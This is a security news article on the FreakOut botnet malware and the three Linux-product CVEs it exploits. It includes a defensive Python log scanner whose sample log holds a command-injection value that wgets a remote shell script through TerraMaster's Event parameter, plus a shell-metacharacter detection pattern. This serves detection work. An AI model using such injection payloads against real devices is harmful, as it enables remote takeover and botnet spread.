FreakOut malware exploits new Linux vulnerabilities

Security researchers have discovered a new malware strain dubbed “FreakOut” that exploits recently disclosed vulnerabilities in Linux-based products.

Check Point Research (CPR) discovered multiple attacks that use a malware variant FreakOut to exploit multiple vulnerabilities on three separate Linux-based products.

“The goal behind these attacks is to create an IRC botnet (a collection of machines infected with malware that can be controlled remotely), which can then be used for malicious activities, such as launching DDoS attacks on other organizations’ networks, or for crypto-mining activity on infected machines, which can potentially shut down entire systems infected,” Check Point explained in the blog post.

Linux device targets

The Check Point researchers confirmed that FreakOut targets and exploits one vulnerability in each of three Linux-based products:

  • TerraMaster TOS (TerraMaster Operating System), the firmware of TerraMaster data storage appliances – CVE-2020-28188
  • Zend Framework, an open source, object-oriented PHP web application framework – CVE-2021-3007
  • Liferay Portal, an open source portal platform for building web applications – CVE-2020-7961

The TerraMaster remote code execution vulnerability, CVE-2020-28188, allows a remote, unauthenticated attacker to inject OS commands through the Event parameter of /include/makecvs.php.

The Liferay vulnerability, CVE-2020-7961, allows remote attackers to execute arbitrary code via the portal's JSON web services (JSONWS) interface.
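The two injection points described above are easy to look for in ordinary web server logs. The script below is an added example written for this article, not code from Check Point or from any of the affected vendors. It assumes Apache/nginx combined log format, that the TerraMaster endpoint is reached at /include/makecvs.php with a query-string Event parameter (as described above), and that Liferay's JSONWS interface is served under /api/jsonws (an assumption about the default deployment path). The log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample log lines in combined log format. The first two simulate
# exploitation attempts against the endpoints described above; the last two are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2021:03:14:07 +0000] "GET /include/makecvs.php?Event=%60wget%20http://198.51.100.7/x.sh%60&Email=a HTTP/1.1" 200 512 "-" "curl/7.64.0"
203.0.113.5 - - [10/Jan/2021:03:14:09 +0000] "POST /api/jsonws/invoke HTTP/1.1" 500 0 "-" "python-requests/2.25"
192.0.2.10 - - [10/Jan/2021:03:15:00 +0000] "GET /include/makecvs.php?Event=1&Email=user%40example.com HTTP/1.1" 200 400 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Jan/2021:03:16:00 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that would let a value break out of a shell command string.
SHELL_META = re.compile(r'[;|&`$<>\n]')

TERRAMASTER_PATH = "/include/makecvs.php"   # injection point named in the article
LIFERAY_JSONWS_PREFIX = "/api/jsonws"        # assumed default JSONWS path


def has_shell_metachars(value: str) -> bool:
    """True if the (decoded) value contains shell metacharacters."""
    # Decode once more to catch double-URL-encoded payloads.
    return SHELL_META.search(unquote(value)) is not None


def scan_access_log(log_text: str):
    """Return a list of (client_ip, rule_name, detail) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        url = urlparse(m["target"])
        path = url.path.lower()

        if path.endswith(TERRAMASTER_PATH):
            # CVE-2020-28188: OS command injection via the Event parameter.
            params = parse_qs(url.query, keep_blank_values=True)
            for value in params.get("Event", []):
                if has_shell_metachars(value):
                    findings.append((m["ip"], "terramaster-makecvs-cmdinj", value))

        elif path.startswith(LIFERAY_JSONWS_PREFIX) and m["method"] == "POST":
            # CVE-2020-7961 is exploited through JSONWS; a POST to that interface
            # from an unexpected client is a coarse indicator worth reviewing.
            findings.append((m["ip"], "liferay-jsonws-post", m["target"]))

    return findings


if __name__ == "__main__":
    for ip, rule, detail in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{detail}")
```

The TerraMaster rule is precise because the injection point is a named parameter; the Liferay rule is deliberately coarse, since legitimate integrations also POST to JSONWS, so tune it to the clients you expect before alerting on it.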

Once a device is infected by FreakOut, attackers use the malware as a remote-controlled attack platform to then target other unpatched machines to spread the infection.

“The FreakOut malware’s capabilities include port scanning, information gathering, creation and sending of data packets, network sniffing, and the capability to launch DDoS and network flooding attacks,” Check Point added.

Furthermore, Check Point spotted more than 380 attack attempts between January 8 and January 13 against its customers. All of those attacks were blocked.

Users of these products should consult the vendor advisories for TerraMaster, Liferay Portal and Zend Framework and apply the latest patches.
